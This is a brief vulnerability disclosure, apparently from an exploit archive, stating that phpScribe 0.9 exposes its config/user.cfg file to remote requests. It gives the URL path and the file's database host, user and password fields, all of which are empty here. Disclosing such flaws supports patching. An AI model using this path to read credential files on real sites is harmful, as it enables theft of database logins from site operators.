phpScribe version 0.9 suffers from a remote configuration disclosure vulnerability.
03bb942073db73bdad5bba92b956a159b83a60da55fa2370d7cfe7acec767db1
.......................................................................................................
/Remote Config File Disclosure/
script: phpscribe-0.9
***************************************************************************
download from:http://downloads.sourceforge.net/phpscribe/phpscribe-0.9.zip?modtime=1071100800&big_mirror=0
***************************************************************************
vul:
www.site.com/path/config/user.cfg
................................
$PS_USER_CFG['DATABASE_HOST']="";
$PS_USER_CFG['DATABASE_USER']="";
$PS_USER_CFG['DATABASE_PASS']="";
$PS_USER_CFG['DATABASE_BASE']="";
$PS_USER_CFG['DATABASE_TYPE']=""
...............................
-------------------------------------------------
-------------------------------------------------
*************************************************
Author: ahmadbady
*************************************************